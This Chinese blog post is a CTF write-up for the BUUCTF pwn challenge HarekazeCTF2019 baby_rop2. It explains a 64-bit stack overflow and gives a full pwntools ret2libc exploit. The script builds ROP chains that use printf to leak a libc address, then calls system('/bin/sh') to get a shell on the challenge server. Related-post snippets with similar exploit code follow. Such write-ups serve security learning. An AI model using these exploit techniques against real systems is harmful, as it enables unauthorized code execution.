[HarekazeCTF2019]baby_rop2

于 2023-05-24 20:43:29 发布
阅读量879 收藏
点赞数
分类专栏: BUUCTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_74020775/article/details/130853951
版权
文章探讨了一种64位程序中利用栈溢出和printf函数来泄露libc地址的技术,通过ROP链构造执行流,最终目标可能是实现代码执行。作者尝试了两种不同的payload,一种pop一个参数,另一种pop两个参数,成功获取了read函数的地址,并进一步计算出libc的基础地址,为执行system调用做准备。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

小白垃圾笔记,不建议阅读。

这道题学到了两个思想吧:

1.一个是有的函数泄露libc打印不写出来。

2.另一个是printf函数的利用吧。

3.栈对齐好像是只有system有。

分析下题目吧:

64位 绕过nx

本来以为第10行,有坑呢。结果好像是我想多了。

第九行存在溢出。

 嗯,啥也没有。

 

那么大概思路就是泄露libc了。

本来我也是想泄露printf的got的,没打通,然后就去搜教程了。没办法。谁让咱菜呢。

网上的脚本有两个一个是pop了两个参数,一个是pop了一个参数。

我都试了下,没有问题,也就是说printf函数pop一个就可以。

脚本如下区别是第一个payload。

from pwn import *
from LibcSearcher import *
debug=0
if debug:
    p=process('./babyrop2')
    elf=ELF('./babyrop2')
    #libc=ELF('/lib/i386-linux-gnu/libc.so.6')
    #p=process('',env={'LD_PRELOAD':'./libc.so'})
    context.log_level='debug'
    #gdb.attach(p)
    libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    p=remote('node4.buuoj.cn',25269)
    elf=ELF('./babyrop2')
    libc=ELF('./libc.so.6')
    context.log_level='debug'
def ru(x):
    return p.recvuntil(x)
 
def se(x):
    p.send(x)
 
def sl(x):
    p.sendline(x)
    
pop_rdi_addr=  0x0000000000400733   # : pop rdi ; ret
ret_addr= 0x00000000004004d1         # : ret
pop_rsi_r15_addr=0x0000000000400731 #: pop rsi ; pop r15 ; ret

printf_plt_addr=elf.plt['printf']
printf_got_addr=elf.got['printf']
main_addr=elf.sym['main']  
read_addr=elf.got['read']
#main_addr=0x0000000000400636
format_str=0x0000000000400770
 
ru(b'name?')
 
 
#下边这一行是只pop一个参数的
#payload=b'b'*0x28+p64(pop_rdi_addr)+p64(read_addr)+p64(printf_plt_addr)+p64(main_addr)   

#这一行是pop两个参数的。
payload = b'a'*0x28+p64(pop_rdi_addr)+p64(format_str)+p64(pop_rsi_r15_addr)+p64(read_addr)+p64(0)+p64(printf_plt_addr)+p64(main_addr)


# read_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
se(payload+b'\n')

read_addr=u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))

#printf_addr=u32(p.recv(4))
print(hex(read_addr))
 
#libc=LibcSearcher('printf',printf_addr)
#libc_base_addr=printf_addr-libc.dump('printf')
#system_addr=libc_base_addr+libc.dump('system')
#bin_sh_addr=libc_base_addr+libc.dump('str_bin_sh')
 
 
 
libc_base_addr=read_addr-libc.sym['read']
system_addr=libc_base_addr+ libc.sym['system']	
bin_sh_addr=libc_base_addr+ next(libc.search(b'/bin/sh\x00'))
 

payload2=b'a'*(0x20+8)+p64(pop_rdi_addr)+p64(bin_sh_addr)+p64(system_addr)
 
 
ru(b'name?')

se(payload2+b'b'*6+b'\n')
#se(payload2.ljust(0x60,b'b')+b'\n')
#ru(b'\n')
p.interactive()
 
#ROPgadget --binary <binary_file> --only "pop|ret" | grep "pop rdi"
#ROPgadget --binary bin --only "pop|ret"
#ROPgadget --binary ./level2_x64 --only "ret"

#ROPgadget --binary babyrop2 |grep "pop rsi"

#write_add=u32(p.recv(4))

#addr=u32(r.recvuntil(b'\xf7')[-4:])
#puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
#sa(b'wish!\n', b'%11$p')
#rl(b'0x')
#canary = int(p.recv(16), 16)

flag在/home/babyrop2/flag

 

HarekazeCTF2019 baby_rop2
pondzhang的专栏
05-07 288
from pwn import * p = process('./babyrop2') libcelf = ELF('./libc-2.23.so') p = process('./babyrop2') p.recvuntil("What's your name? ") pltprintf = 0x00000000004004F0 gotread = 0x0000000000601020 popr...
BUUCTF [HarekazeCTF2019]baby_rop2
红叶的博客
10-28 443
IDA Pro 静态调试。依旧可以使用上次的PoC。
buuctf|[HarekazeCTF2019]baby_rop 1
m0_64236521的博客
05-02 1306
buuctf|[HarekazeCTF2019]baby_rop 1 分析 下载文件重命名为pwn_15,checksec一下 只开启了NX,64位,用ida看看 这里可以栈溢出,同时在侧面看到了system() shift+F12查看字符串 找到binsh,由于是64位,我们要寄存器传参,ROPgadget下 exp如下 from pwn import* p=remote('node4.buuoj.cn',25977) #p=process("./pwn_15") system_addr=0x
BUUCTF pwn [HarekazeCTF2019]baby_rop2
菜的只能随便写写博客
02-17 1770
0x01 文件分析   0x02 运行  和babyrop一样。   0x03 IDA  程序流程和babyrop差不多,但是这个里面没有提供可用的gadget,需要自己完成rop。   0x04 思路  没有默认的gadget,需要自己构建,需要利用栈溢出和printf函数泄露libc版本和libc基址,再构建rop。需要注意的是printf函数需要用到的参数,第一个参数需要为格式化字符...
harekazeCTF2019_babyrop2
weixin_44645415的博客
05-26 344
解题思路:ROP 检查保护 Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 定位漏洞 int __cdecl main(int argc, const char **argv, const char **envp) { char buf[28]; // [rsp+
[PWN] BUUCTF [HarekazeCTF2019]baby_rop2
空城惜梦的博客
06-09 562
[PWN] BUUCTF [HarekazeCTF2019]baby_rop2解题分析漏洞利用payload解析payload 解题分析 按照惯例先checksec,发现开了nx和RELRO,又因为题目给了文件libc.so.6,所以猜测要需要构造ROP来布置程序执行路线图 运行程序来观察程序的逻辑,发现需要输入name,然后程序再把输入的name打印出来 64位IDA打开,发现buf缓冲区只有0x20个字节大小,但read却可以往buf缓冲区中写入0x100个字节,所以这里存在着栈溢出 shift+
[HarekazeCTF2019]baby_rop2【BUUCTF】
qq_41696518的博客
09-02 433
明显存在栈溢出,那么就是找system和/bin/sh的问题了,该题给了libc,那就是泄露出真实的libc载入基址本题即可求解。由于本题是64位的,因此参数要写入寄存器中,顺序为rdi,rsi,rdx,rcx,r8,r9。
【BUUCTF - PWN】baby_rop2
古月浪子的博客
04-18 499
checksec一下,栈溢出 IDA打开看看,明显的栈溢出漏洞 题目给了libc文件,使用printf把read的got地址打印出来即可泄露libc地址,然后one_gadget拿shell from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_leve...
buuctf [HarekazeCTF2019]baby_rop2
carol2358的博客
04-21 483
一道常规的泄漏libc然后rop的题目 exp: from pwn import * from LibcSearcher import * local_file = './babyrop2' local_libc = './libc.so.6' remote_libc = './libc.so.6' select = 1 if select == 0: r = proce...
[HarekazeCTF2019]baby_rop2 wp (python3)
最新发布
Kata_Jhin的博客
05-21 266
而我们用到的format,是很大依托的,所以需要用recvutil,64下的地址开头基本上都是"\x7f"所以就可以把它当做标识符,因为是小端序,所以我们从-6开始正序读取(-6标识符下的第一个数字是-1)比较明显的libc,因为是64位程序,所以需要‘’pop+参数数据add的‘’形式,不然不符合64的函数调用约定,这里泄露就直接使用主函数的那个存在%s的字符串。因为是全路径检索,后面的permission denied是没权限的意思,结果太多我一来没看见第一行的查询找到的结果(阿西....)
buuctf pwn [HarekazeCTF2019]baby_rop2
weixin_45441024的博客
12-03 521
buuctf pwn [HarekazeCTF2019]baby_rop2 ret2libc 老样子还是先check一下,发现开启了NX,说明我们不能利用ret2shellcode了,将文件放到IDA里面来分析一下 题目中有%s字符的字样,我们就想到了利用格式化字符串来泄露某个函数的真实地址,来找到libc的版本,最后拼接出一个system("/bin/sh")来获取shell,通过上图我们找到了溢出点在read函数,buf距离栈底的高度为0x20 因为这是一个64位的程序,其参数是通过寄存器来传递的,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

y6y6y666

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值